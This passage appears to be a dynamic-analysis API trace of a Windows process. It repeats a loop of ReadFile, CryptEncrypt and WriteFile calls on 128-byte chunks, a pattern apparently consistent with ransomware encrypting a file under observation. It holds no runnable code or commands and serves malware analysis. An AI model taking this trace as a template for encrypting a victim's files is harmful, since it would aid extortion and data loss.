lpOverlapped=0x0) returned 1 [0041.267] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.268] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.268] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.269] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.269] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.270] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.270] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, 